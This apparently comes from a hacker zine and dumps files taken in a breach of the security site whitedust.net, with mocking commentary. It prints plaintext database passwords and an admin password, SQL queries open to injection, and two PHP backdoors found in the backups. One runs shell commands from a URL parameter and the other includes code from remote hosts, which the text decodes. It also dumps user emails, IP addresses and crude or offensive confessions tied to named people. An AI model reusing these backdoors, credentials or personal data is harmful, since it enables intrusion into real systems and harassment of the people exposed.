http://www.clutzed.com/forum
http://roxorz.org/phpbb/
http://www.soljo.org/london/forum/
http://www.second-time-around.co.uk/phpBB2/index.php
http://addendum.proboards22.com/
http://maddox.xmission.com/
http://www.spaced-out.org.uk/
http://www.merentha.com/
http://www.vampiretheseduction.net/html/
http://merenthaunderground.frostenterprises.com/home.htm
http://www.patman.org/wod/wodindex.asp
http://www.palmblvd.com/
http://www.bb4win.org/news.php
http://whitedust.net/awstats/
http://www.submitcorner.com/Tools/Submit/
http://www.sms.ac/
http://searchenginewatch.com/facts/article.php/2156041
http://world.altavista.com/
http://www.publicproxyservers.com/page1.html
http://www.webstats.xcalibre.co.uk/
http://www.xcalibre.co.uk/status.php
http://cp.xcalibre.co.uk/
http://www.bt.com/favicon.ico
http://svr1.16o.com/tools/qmailadmin/
http://www.uksmallbusinessdirectory.co.uk/
http://www.start-linux.com/
http://www.feeds4all.com/
http://www.securiteam.com/exploits/
http://exploitwatch.org/modules/evennews/
http://www.8th-wonder.net/exploits.dxd
http://johnny.ihackstuff.com/
http://neworder.box.sk/explmore.php
http://www.k-otik.com/english/index.php
http://londonlostandfound.com/free/freereviews.htm
http://www.masternewmedia.org/rss/top55/
http://www.worldcomputerexchange.org/
http://www.gamespot.com/ps2/action/gta4/hints.html
http://attrition.org/security/commentary/
http://searchsecurity.techtarget.com/
http://www.securitypark.co.uk/
http://lists.freebsd.org/mailman/listinfo
http://www.insecure.org/
http://blackhat.com/
http://www.dynamichell.com/e107/news.php
http://www.infoanarchy.org/
http://www.microsoft.com/technet/security/bulletin/advance.mspx
As you can see, that's a really elite hacker there. They steal all their
news from only the best sites.
$ ls Mail
Net PEAR.php RFC822.php mail.php mime.php mimeDecode.php
mimePart.php null.php sendmail.php smtp.php xmail.dtd xmail.xsl
$ ls blackdust/
blackdust-small.png blackdust.png cgi-bin index.php
search.php style.css
blackdust.net.zip blackdust.xml customize.php referrals.txt
spacer.gif
$ head blackdust/referrals.txt
http://www.dinside.no/artikler/whitedust/artid390761.html
http://www.dinside.no/artikler/whitedust/artid390761.html
http://www.dinside.no/php/art.php?id=390761
http://www.dinside.no/artikler/whitedust/artid390761.html
http://www.google.no/search?hl=no&q=Whitedust&btnG=S%C3%B8k&meta=
http://www.dinside.no/artikler/whitedust/artid390761.html
http://www.abcnyheter.no/node/49761
http://www.dinside.no/artikler/whitedust/artid390761.html
http://www.sol.no/
http://www.dinside.no/artikler/whitedust/artid390761.html
$ head -20 blackdust/search.php
<?
// Blackdust Anonymous Google Proxy - http://blackdust.whitedust.net/
// 2007-07-25 version 1.0
$link = "http://www.google.com/search?safe=off&meta=";
foreach($_GET as $name => $value) {
$link .= "&" . urlencode($name) . "=" . urlencode($value);
if ($name == "query") { $query = $value; }
if ($name == "q") { $query = $value; }
}
$data = file_get_contents ($link);
$data = str_replace ("\\"", """, $data);
$data = str_replace ("\\'", "'", $data);
$searchCountry = "<select name='cr' style='width: 45px;'></option> \
<option value=''>-</option> \
<option value=countryAR>AR - Argentina</option> \
<option value=countryAM>AM - Armenia</option> \
Amazing technology!
From blackdust/index.php:
<p style="color: red;">
In Blackdust's first week it received a staggering 50,000 unique
hits.<br/>
We now realise just how important this tool is to many people. We
thank<br/>
you for your supportive emails and comments. This message will be
taken down<br/>
in two days. Please help spread the word.<br/>
<br/>
Thank you Whitedust for providing the world with an anonymous search
engine! Your originality never ceases to amaze.
Maybe these guys will log queries once they figure out how.
$ ls captcha/
CaptchaSecurityImages.php Griffin.ttf monofont.ttf type_right.ttf
lol @ http://www.white-hat-web-design.co.uk in the .php
$ ls labs/
1.css eve gypsy images inc-footer.php inc-header.php index.php
$ ls labs/eve/
EveInstaller.exe changelog.php eve-bittorrent3.html
eve.xml inc-footer.php panel sgen.php
about.php contact.php eve-bittorrent3_media
evepr.txt inc-header.php press.php sitelicense.php
activeparticipation count.txt eve-pr20070523.txt
faq.php index.php register.php sitemap.php
activeparticipation.php download-count.php eve-pr20070618.txt
features.php index.php.old-bad screenshots style.css
apreg.php download.php eve.pad images
media.php scripts version.txt
$ cat labs/eve/count.txt
4194
$ head labs/eve/evepr.txt
FOR IMMEDIATE RELEASE
Contact: Mark Hinge, Operations Director, Whitedust.net
Tel: +44 - (0)07908-871-091
Email: mark.hinge@whitedust.net
DO YOU KNOW WHAT IS HAPPENING ON YOUR NETWORK? EVE DOES.
Whitedust Labs releases software that allows administrators to visualize
network traffic in real-time 3D.
$ Do you know what is happening on YOUR network? ZF0 DOES.
$ ls labs/eve/panel/
currentversion-files currentversion-files.php currentversion-number.php
mailshot.php unsub.php
$ head labs/eve/panel/unsub.php
<?
// ### Eve Unsub
// ### copyright Mark Anderson / Whitedust.net 2007
$db_host = "localhost";
$db_user = "markande_apuser";
$db_pass = "eveistheshit";
$db_db = "markande_eveap";
// connect to db
$ grep -i password labs/eve/panel/mailshot.php
if ($_REQUEST['Password'] == 'cocaine') {
$status = "Password invalid.<br/>\n";
<td>Password:</td><td><input
type='password' name='Password' class='textarea'></td>
$ grep -i select labs/eve/apreg.php
$db_selected = mysql_select_db($db_db, $db_remote);
if (!$db_selected) {
die('DB ERROR, could not select $db_db database: ' .
mysql_error());
$sqlchk = "select Username from serials where
(Username = '$username')";
$sqlchk = "select Serial from serials
where (Email = '$email' and Serial = '$serial')";
$sqllst = "select Username, Password from serials where (Username
!= '' and Password != '')";
$ ls labs/gypsy/
GypsyBETA2.rar contact.php install.php paypal.jpg
ss-dos.jpg ss-main-thumb.jpg ss-menu.jpg
about.php download.php logo.jpg screenshots.php
ss-emu-thumb.jpg ss-main.jpg
banner-standard.jpg index.php packages.php ss-dos-thumb.jpg
ss-emu.jpg ss-menu-thumb.jpg
$ ls publishing/
1.css archive images inc-footer.php inc-header.php index.php
$ ls publishing/archive/
Other Other.rar RWM.rar SPACT.rar b0rk b0rk.rar doj doj.rar rwm
soljo soljo.rar spact
$ ls shop/
1.css cgi-bin eveonline.php images inc-footer.php inc-header.php
index.php
$ cat data_referers.txt
http://blackdust.whitedust.net/
http://www.cultdeadcow.com/cms/main.php3
http://my.yahoo.com/p/d.html
http://my.yahoo.com/p/d.html
RSS Concentrator
$ ls common/
classes inc-conf.php inc-db.php inc-library.php lastRSS.php
modrestoreblog.php rss.php
$ ls common/classes/
cBlogs.php cComments.php cNews.php cPages.php cProfiles.php cRSS.php
cReferrals.php cUsers.php
$ grep -i select common/classes/cUsers.php
$retchk = mysql_query ("select UserID from wd3_users where
(Username = '$username' and Email = '$email' and UserID = '$I' and
ActivateKey = '$key')", $db_remote);
$retchk = mysql_query ("select UserID, Email, Username,
ActivateKey from wd3_users where (Username = '$username' or Email =
'$email')", $db_remote);
$retchk = mysql_query ("select UserID, Priv, LastIP,
LastLogin, Email, Active from wd3_users where (Username = '$username' and
Password = '$cpassword')", $db_remote);
$retsel = mysql_query ("select Username from wd3_users
where (UserID = '$userid')", $db_remote);
$retchk = mysql_query ("select UserID, Priv, LastIP,
LastLogin, Email, Active from wd3_users where (Username = '$username' and
Password = '$cpassword')", $db_remote);
$retchk = mysql_query ("select InviteID from wd3_invites
where (Email = '$email' and RSVP = 0)", $db_remote);
$retchk = mysql_query ("select UserID from wd3_users where
(Email = '$email')", $db_remote);
$retchk = mysql_query ("select UserID from wd3_users where
(Username = '$username')", $db_remote);
$retchk = mysql_query ("select UserID from wd3_users where
(ActivateKey = '$key')", $db_remote);
$ head common/inc-conf.php
<?
$cookiedomain = ".whitedust.net";
$emailaddy = "mark.anderson@whitedust.net";
$uploaddir = "/home/markande/domains/whitedust.net/public_html/";
$db_host = "localhost";
$db_user = "markande_dbuser";
$db_pass = "doesabearshitinthewoods";
$db_db = "markande_whitedust";
$ head common/inc-library.php
<?
$cmd = $_REQUEST['cmd'];
if ($cmd == 'un') {
$id = mysql_escape_string ($_GET['I']);
$email = mysql_escape_string ($_GET['E']);
$sqldel = "delete from wd_newsletter where (ID = '$id' and Email =
'$email')";
$retupd = mysql_query ($sqldel, $db_remote);
$err_txt = "You have been unsubscribed.";
$ grep inc-library.php *
404handler.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
archive.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
controlpanel.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
cp_changepassword.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
cp_createpage.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
cp_deletenews.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
cp_deletepage.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
cp_editnews.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
cp_editpage.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
cp_managesections.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
cp_newsreader.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
cp_postnews.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
cp_postsidenews.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
filter.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
index.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
login.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
search.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
sections.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
viewnews.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
viewpage.php:include_once
'/home/markande/domains/whitedust.net/public_html/common/inc-library.php';
Check out the security through obscurity!
Now that we have seen the ins and outs of WD3, let's take a trip back in
time. Conveniently they neither package their backups nor make them
unviewable from the web.
$ ls backup20070105/
101 data_comingsoon.txt data_todo.txt
index.php search.php
addcomment.php data_counter.txt
data_yesterdaysnews.txt lastRSS.php section.php
addnews.php data_counter101.txt db.php
modaddnews.php security
adfiles data_google.txt emailtofriend.php
newpollvote.php sitemap.php
advancedsearch.php data_internalad.txt favicon.ico
newsletter_click.php solemnity
advancedsearchresults.php data_internaladrss.txt figlet
newsol survey.php
archives.php data_news.txt
forgottenpassword.php newsview.php template.php
articles.rss data_news101.txt getpdf.php
oldnews.php test.php
articles101.rss data_polloptions.txt google.php
phpinfo.php view.php
articlesonly.rss data_pollquestion.txt
googleaf57792d65dedc80.html pngbehavior.htc view101.php
conf.php data_quicklinks.htm images
pollview.php wd-popup
consulting data_quote.txt inc-conf.php
pollvote.php wd.css
contactpopup.php data_referers.txt inc-db.php
popup-images whitedustspeaks.php
data_archive.txt data_scrapbook.txt inc-library.php
popup.html
data_articles.txt data_sections.txt index.dev.php
popup.js
data_articles101.txt data_template_newsletter.txt index.new.php
printpage.php
We can now see the main improvements from the redesign: Cronus' fantastic
file organization skills.
$ head backup20070105/conf.php
<?
$cookiedomain = ".whitedust.net";
$emailaddy = "mark.anderson@whitedust.net";
$uploaddir = "/home/markande/domains/whitedust.net/public_html/";
$db_host = "localhost";
$db_user = "markande_dbuser";
$db_pass = "doesabearshitinthewoods";
$db_db = "markande_whitedust";
$ cat backup20070105/data_todo.txt
Things To Add
============
- Random Page Summery & Link Displayed on Front Page.
- Site Map.
- More Amazon Reviews.
- Fix Mail List.
- Mailing List Editorial Option.
- Mailing List Forum Connection.
- 3rd Party Document Archive? Security paper archive.
- Slashdot this link, Digg this link.
^^^^ cause slashdot won't take them from you anymore
- Visual Update Box.
^^^^ ooh visual
- "Hacking A Crime Or Ideology"
- Remind Cronus To Setup Bank Details In Spreadshop.
- Fashion/Marketing Student Help With Shop Promotion.
- games.whitedust.net
- Mitnick interview via Fyodor.
- Linus interview.
- Pirate Bay Interview.
- Richard Stallman Interview.
- Mark Abene Interview.
- John Draper Interview (crunch@webcrunchers.com).
- White Mail www.whitemail.ie # cronus can sort
- NOD32 www.nod32.com # cronus can sort
+ Probably any product listed on www.reflex.ie
Thing To Remove
==============
- None At This Time.
^^^^ - Shitty code
^^^^ - Bugs
^^^^ - Whitedust.net
Vague Concepts
=============
- Concept: Kids are being discouraged from "Hacking" we could encourage
"Computer Security Awareness"?
- Concept: Get words of praise from various sources (Email Past Interview
Subjects For Positive Comments On Whitedust For Testimonial Page).
Things On The Boil
================
- Site Redesign.
- WD Conference.
Look at the juvenile mind of a Whitedust employee! Look at his great
plans! Look at him beg for words of praise!
$ ls backup20070105/security/
cgi-bin
$ ls backup20070105/security/cgi-bin/
$
I was worried for a second that they had some security on site!
$ cat backup20070105/test.php
<?
echo system('which php', $ret);
phpinfo();
?>
$ ls backup20070105/consulting/
consulting-link.png development.php index.php testing.php
wdc-mainpagelinkconcept.png
design.php graphics research.php training.php
wdc-minisite-concept.png
I bet they didn't get many requests for their elite knowledge and skills.
$ ls backup20070105/101
addcomment.php articlesonly.rss data_articles.txt data_sections.txt
emailtofriend.php index.php wd.css
archives101.php base.php data_articles101.txt
data_yesterdaysnews.txt getpdf.php printpage.php
articles.rss cgi-bin data_news.txt date.php
header101-small.jpg section101.php
articles101.rss data_archive.txt data_news101.txt download.php
header2101-small.jpg time.php
Check it out, someone owned Whitedust and the backdoor didn't get
removed.
$ cat backup20070101/101/download.php
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=".
base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("") . sprintf("%u",
ip2long(getenv(REMOTE_ADDR))) ."&url=". b
ase64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth
. $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
$ diff backup20070101/101/date.php backup20070101/101/download.php
$ cat backup20070101/101/base.php
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ?
$_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ?
$_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])
? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])
? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ?
$_SERVER["QUERY_STRING"] :
$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ?
$_SERVER["HTTP_REFERER"] :
$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ?
$_SERVER["HTTP_USER_AGENT"] :
$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ?
$_SERVER["REMOTE_ADDR"] :
$REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_enco
de($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f)."
.".base64_encode($g).".".base64_encode($h).".$s"; if
((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ
1")."/?".$str))){} else
{include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3Mu
cnU=")."/?".$str);} ?>
$ diff backup20070101/101/base.php backup20070101/101/time.php
$ cat backup20070101/101/.htaccess
Options -MultiViews
ErrorDocument 404 //101/base.php
Options -MultiViews
ErrorDocument 404 //time.php
Although the backdoor could have been inserted at any time, the .htaccess
looks like it was built for the original setup.
Allow us to save you the time decoding the base64.
aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9 :
http://bis.iframe.ru/master.php?r_addr=
aHR0cDovLw== : http
dXNlcjkubXNodG1sLnJ1 : user9.mshtml.ru
dXNlcjcuaHRtbHRhZ3MucnU= : user7.htmltags.ru
So, some elite Russian hax0rs owned Whitedust and added four php files to
the directory. They then added a .htaccess with custom 404s to make it
even easier for them. That easily could be from some mass 0wning tool.
How the hell did Whitedust not notice this? Could the backdoors be any
more obvious? Even if just one was found it should have lead to the
others being noticed immediately. Did Cronus and psg just _never_ check
out their website files, or review their code, let alone do any security
checks?
Now let's check out the July backups.
$ ls backup20070717/
0day.php admin_editpage.php con
forums index-survey.php projects.php
1.css admin_editsection.php data_articles.thtml
forums_old index.php robots.txt
101 admin_internalad.php
data_currenteditorial.thtml hakspace-feed.php lastRSS.php
search.php
Mail admin_listnews.php data_headline.thtml
helloworld.php mckinnon section.php
Mail.php admin_listpages.php data_news.thtml
images modaddnews.php security
PEAR.php admin_poll.php data_referers.txt
inc-conf.php modapprovecomment.php send.php
admin_bin.php admin_rssfeeds.php data_rsslist.txt
inc-db.php modccount.php submit.php
admin_comingsoon.php admin_sections.php data_scrapbook.txt
inc-footer.php new.php survey.php
admin_createad.php admin_survey.php
data_template_newsletter.htm inc-footer.thtml newpollvote.php
text
admin_createnews.php admin_todo.php data_todo.txt
inc-header.php newsletter_click.php view.php
admin_createpage.php admin_viewuser.php
data_yesterdaysnews.thtml inc-header.thtml newsview.php
whitedust-articles.rss
admin_createsection.php advancedsearch.php editorial.php
inc-library.php openwysiwyg whitedust-comments.rss
admin_cronjob.php advancedsearchresults.php editorial.png
include pollview.php
admin_editnews.php archives.php filter.php
index-paging.php popup.html
0day! Let's check it out!
$ grep 0day backup20070717/0day.php
<? gen_0daylistlong(); ?>
$ grep gen_0day backup20070717/*
0day.php:<? gen_0daylistlong(); ?>
inc-conf.php:function gen_0daylistlong () {
inc-conf.php:function gen_0daylist () {
index.php:<? gen_0daylist(); ?>
$ grep zeroday backup20070717/inc-conf.php
if ($rs = $rss->get('http://research.eeye.com/rss/zeroday.rss')) {
if ($rs = $rss->get('http://research.eeye.com/rss/zeroday.rss')) {
Ok, so maybe it isn't real 0day. But let's keep looking, I'm sure there is
something interesting around.
$ ls security/
cgi-bin
Still no security.
$ cat backup20070717/helloworld.php
<?
sleep(5);
echo time();
?>
$ ls backup20070717/forums/
cgi-bin
$ ls backup20070717/forums_old/
cgi-bin index.php
$ cat backup20070717/forums_old/index.php
<?
// start the session
$expireTime = 60*60*24*100; // 100 days
session_set_cookie_params($expireTime, "/", ".whitedust.net");
session_start();
header("Cache-control: private"); //IE 6 Fix
include '../inc-conf.php';
include '../inc-db.php';
$cmd = $_GET['cmd'];
if ($cmd == '') { $cmd = $_POST['cmd']; }
$pageid = mysql_escape_string ($_GET['PageID']);
if ($pageid == '') { $pageid = mysql_escape_string ($_POST['PageID']); }
$err_txt = $_GET['err_txt'];
if ($err_txt == '') { $err_txt = $_POST['err_txt']; }
include '../inc-header.thtml';
?>
<p class="description">
<b
class="headline">Whitedust Forums</b><br/>
</p>
<div id="contentwide">
<IFRAME SRC="http://www.whitedust.net/forum/" WIDTH="100%" HEIGHT="800"
TITLE="Whitedust Forums" border="0">
<!-- Alternate content for non-supporting browsers -->
</IFRAME>
</div>
</div>
</div>
<? include '../inc-footer.thtml'; ?>
Thank God Cronus lacked the skills to write his own forum!
In case one wanted to know, there was 28MB of session data from the
backup directories. I suppose the Whitedust folks thought it was important
to keep that information.
O hai! db time!
The WD db is fat. Babe Ruth fat. As you can guess, it is bloody full of
everything ever produced on whitedust.net. Which just isn't cool. Not only
that, but they have spam in their db. Lots of it. Please clean the porn
spam out, for the next guy who wants to go through this.
We can still find some fun for you.
-- Dumping data for table `wd3_confessions`
--
INSERT INTO `wd3_confessions` VALUES (1, 'I forget my passwords all the
time. I am mentally retarded.', 2, '86.128.242.50');
INSERT INTO `wd3_confessions` VALUES (2, 'Once, I sparked a brand new mobo
with a screw driver because I left it on while I was overclocking it. Tha
t was pretty dumb.', 2, '86.128.242.50');
INSERT INTO `wd3_confessions` VALUES (3, 'A few years back, while
installing a beta of Win2K, I decided to re-partition the wrong hard drive
and wip
ed out my main Linux install instead of the junk partitions on the drive I
meant to use. Didn\\''t lose anything of particular value, but plenty of
files that I\\''d like to still have.', 2, '86.128.242.50');
INSERT INTO `wd3_confessions` VALUES (4, 'Many years ago, we had a cluster
of vaxen connected by this new-fangled thin-wire ethernet. On one occasio
n I managed to catch my foot in a dangling cable and pull a plug out. The
whole cluster came to a juddering halt and everything had to be rebooted (
apparently vax clusters are very intolerant of broken connections).', 2,
'86.128.242.50');
INSERT INTO `wd3_confessions` VALUES (5, 'I Left a Win NT server running
on some old scsi drives stay on for an entire summer without supervision.
I
\\''m not entirely sure why the drive didn\\''t power down, but when we
came back there was a hole blown through one side of the drive and all of
th
e platters were ground to a fine magnetic dust.', 2, '86.128.242.50');
INSERT INTO `wd3_confessions` VALUES (6, 'I beat off to an image of Mark
Hinge.', 0, '69.149.55.127');
INSERT INTO `wd3_confessions` VALUES (7, 'Once while browsing my schools
database. Some idiot copied the entire schools SSN\\''s and other
sensitiv
e data into a public folder. I sold ever last byte of data. ', 0,
'207.62.142.90');
INSERT INTO `wd3_confessions` VALUES (8, 'I eat cat...no seriously nigga,
I do. It\\''s good as fuck too. Try that shit!', 0, '71.41.119.106');
INSERT INTO `wd3_confessions` VALUES (9, 'Hackers is the best movie
ever.', 0, '75.45.93.66');
INSERT INTO `wd3_confessions` VALUES (10, 'Mark is really a lady, which is
why he loves men so much', 0, '195.153.0.146');
INSERT INTO `wd3_confessions` VALUES (11, 'I hate myself.', 0,
'15.235.153.105');
INSERT INTO `wd3_confessions` VALUES (18, 'I once hacked my localhost
without realizing it was my own comp.', 0, '85.227.190.206');
INSERT INTO `wd3_confessions` VALUES (17, 'If I had a penny for every
stupid coding mistake I\\''ve made, I\\''d have a penny.', 0,
'89.125.72.46');
INSERT INTO `wd3_confessions` VALUES (14, 'I, on occasion, hacketh on
Sunday.', 0, '129.169.173.159');
INSERT INTO `wd3_confessions` VALUES (15, 'Hakspace now knows how to
prevent against \\"simple xss\\" :P', 2, '86.128.245.103');
INSERT INTO `wd3_confessions` VALUES (16, 'I forgot about xss when
throwing this confessional together... Opps.', 0, '89.125.72.46');
INSERT INTO `wd3_confessions` VALUES (19, 'I put porn on my catholic high
schools web page. It was glorious!', 0, '207.62.142.90');
INSERT INTO `wd3_confessions` VALUES (20, 'printed off the pwd list in
clear txt, left it on the printer. goamin jebus, cant u get a bros back,
we a
ll know u were english', 0, '80.6.1.228');
INSERT INTO `wd3_confessions` VALUES (21, 'Kevin Mitnick is a narc', 0,
'213.132.44.209');
INSERT INTO `wd3_confessions` VALUES (22, 'I forget his passwords all the
time, I am mentally retarded\r\n', 0, '70.181.60.235');
INSERT INTO `wd3_confessions` VALUES (23, 'I sucked off Mark Hinge for an
invite to Hakspace.', 23, '208.29.186.54');
INSERT INTO `wd3_confessions` VALUES (24, 'I\\''m a psychopathic sadist.
Nothing turns me on like fear and panic and raw terror in a girl\\''s
eyes.
', 0, '64.184.139.50');
INSERT INTO `wd3_confessions` VALUES (25, 'Mark Hinge is the secret
identity of the superhero Electric Warrior.', 0, '64.184.139.50');
INSERT INTO `wd3_confessions` VALUES (26, 'I have dreams where I can fly
and make people explode. In one of my past lives I must have been a
fighter
plane.', 0, '64.184.139.50');
INSERT INTO `wd3_confessions` VALUES (27, 'Looking at PERL makes me fly
into a violent rage and crush people with steamrollers', 0,
'64.184.139.50')
;
INSERT INTO `wd3_confessions` VALUES (28, 'i still cant figure out how to
shot web', 0, '64.184.139.50');
INSERT INTO `wd3_confessions` VALUES (29, 'Once, back in the early years
of the WWW, I had this win3.11 486 with a compressed hard drive. I was not
satisfied with how small the hard drive was, so in an effort to free up
more space I deleted the compression file on H:. It did indeed free up
disk
space. I cried. \r\nTrue Fact!', 0, '64.184.139.50');
INSERT INTO `wd3_confessions` VALUES (30, 'i\\''m in love with a fictional
character and feel so ashamed and stupid but i can\\''t help it', 0, '64.
184.139.50');
INSERT INTO `wd3_confessions` VALUES (31, 'I never follow through on my
promises to do things for people.', 0, '64.184.139.50');
INSERT INTO `wd3_confessions` VALUES (32, 'I found the \\"mental
retard\\"\\''s passwords and changed them all :)', 0, '64.184.139.50');
INSERT INTO `wd3_confessions` VALUES (33, 'It took me three days to mount
a USB drive on slackware :(', 0, '86.128.245.103');
INSERT INTO `wd3_confessions` VALUES (34, 'I am not in love with a
fictional character but I still really want to bang Scarlet Johanson.', 2,
'86.12
8.245.103');
INSERT INTO `wd3_confessions` VALUES (35, 'I did both my ex\\''s best
friends. That\\''ll teach her.', 2, '86.128.245.103');
INSERT INTO `wd3_confessions` VALUES (36, 'I watched most of mad max three
yesterday jsut so i could hear HERO by tina turner in that context... and
they fucking cut it. That\\''s the definition of disappointing.', 2,
'86.128.245.103');
INSERT INTO `wd3_confessions` VALUES (37, 'I pissed in the iced tea while
working at McDonalds.', 0, '208.135.167.58');
INSERT INTO `wd3_confessions` VALUES (38, 'I pissed in the iced tea while
working at McDonalds.', 0, '208.135.167.58');
INSERT INTO `wd3_confessions` VALUES (39, 'Kevin Mitnick has more money
than God. And he\\''s not God.', 0, '86.128.245.103');
INSERT INTO `wd3_confessions` VALUES (40, 'Once I stole someone\\''s
mouseball at work.', 0, '71.217.127.25');
INSERT INTO `wd3_confessions` VALUES (41, 'I\\''ve finally paid off my
computer. It\\''s been 2 years of monthly payments, 2 years of joy,
sadness,
porn, ridiculous mailing friends, a 39 year old woman stalking me over the
msn after being humped and choked, oh boy, that woman could suck. She\\''
s dismissed by this controllable beast for a keyboard, click. Oh gosh,
times are changing, credits are being washed away, only 239 Swedish crowns
to
go, it\\''s amazing how the internet can keep you amused for 40$ a month,
it\\''s a fuckin\\'' devil\\''s bargain. \r\n\r\nThey tell me that the in
ternet should be free of charge, it is, just think of all the pussies you
can get over the net for 40$. A short introduction of yourself, a picture
of your cock and you\\''re all set. You can\\''t even get a blowjob from a
prostitute on the streets for that price, so yeah, the internet is alread
y free of charge. All the things I\\''ve ordered with this digital
masterpiece, oh boy, it\\''s countless. And the best part... it\\''s all
mine now
.\r\n\r\n', 0, '81.236.159.119');
INSERT INTO `wd3_confessions` VALUES (42, 'I still smell blooommuhs and
plagiarize Lenny Bruce;maybe if I got my head outa my pants?', 0,
'64.114.17
5.220');
INSERT INTO `wd3_confessions` VALUES (43, 'every single program on my pc
is pirated... im a budget guy', 31, '86.140.164.35');
INSERT INTO `wd3_confessions` VALUES (44, 'dead girls dont say no ;)', 31,
'86.140.164.35');
Most are anonymous but a few are interesting:
INSERT INTO `wd3_confessions` VALUES (15, 'Hakspace now knows how to
prevent against \\"simple xss\\" :P', 2, '86.128.245.103');
# good work psg! now onto sql injection!
INSERT INTO `wd3_confessions` VALUES (23, 'I sucked off Mark Hinge for an
invite to Hakspace.', 23, '208.29.186.54');
# 'Nox_Deveraux@hotmail.com', 'vioxis'
INSERT INTO `wd3_confessions` VALUES (35, 'I did both my ex\\''s best
friends. That\\''ll teach her.', 2, '86.128.245.103');
# naughty psg! Is your current girlfriend one of them?
INSERT INTO `wd3_confessions` VALUES (44, 'dead girls dont say no ;)', 31,
'86.140.164.35');
# 31, 'jswray@hotmail.com', 'Hellz UK'
-- Dumping data for table `wd3_invites`
--
INSERT INTO `wd3_invites` VALUES (1, 'mark.anderson@whitedust.net', 0, 1);
INSERT INTO `wd3_invites` VALUES (2, 'mark.hinge@whitedust.net', 0, 1);
INSERT INTO `wd3_invites` VALUES (7, 'jake.black@whitedust.net', 1, 1);
INSERT INTO `wd3_invites` VALUES (6, 'jake.black@whitedust.net', 1, 1);
^^^^^ super important double invite
INSERT INTO `wd3_invites` VALUES (8, 'retro@whitedust.net', 2, 1);
INSERT INTO `wd3_invites` VALUES (9, 'liamshee@hushmail.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (10, 'info@mellow.ie', 1, 1);
INSERT INTO `wd3_invites` VALUES (11, 'info@mellow.ie', 1, 1);
^^^^^ omg-bak quadrouple invite!
INSERT INTO `wd3_invites` VALUES (12, 'info@mellow.ie', 1, 1);
INSERT INTO `wd3_invites` VALUES (13, 'info@mellow.ie', 1, 1);
INSERT INTO `wd3_invites` VALUES (14, 'voshika@hakspace.net', 2, 1);
INSERT INTO `wd3_invites` VALUES (15, 'whitedust@hakspace.net', 2, 1);
INSERT INTO `wd3_invites` VALUES (16, 'hakspace@hakspace.net', 2, 1);
INSERT INTO `wd3_invites` VALUES (17, 'zachary.ehnerd@whitedust.net', 2, 1);
INSERT INTO `wd3_invites` VALUES (18, 'peter.prickett@whitedust.net', 2, 1);
INSERT INTO `wd3_invites` VALUES (19, 'Oracle.GreenDiamond@gmail.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (20, 'prgmmstr@hotmail.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (21, 'l0gic@l0gic.net', 2, 0);
INSERT INTO `wd3_invites` VALUES (22, 'kussic@mac.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (23, 'talonprime@gmail.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (24, 'webmaster@cultdeadcow.com', 2, 0);
INSERT INTO `wd3_invites` VALUES (25, 'kyrill.poole@gmail.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (26, 'Nox_Deveraux@hotmail.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (27, 'ganesh.devarajan@gmail.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (28, 'mark.collins@westgateit.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (29, 'robohara@robohara.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (30, 'joe@cotch.net', 2, 0);
INSERT INTO `wd3_invites` VALUES (31, 'myles@cultdeadcow.com', 2, 0);
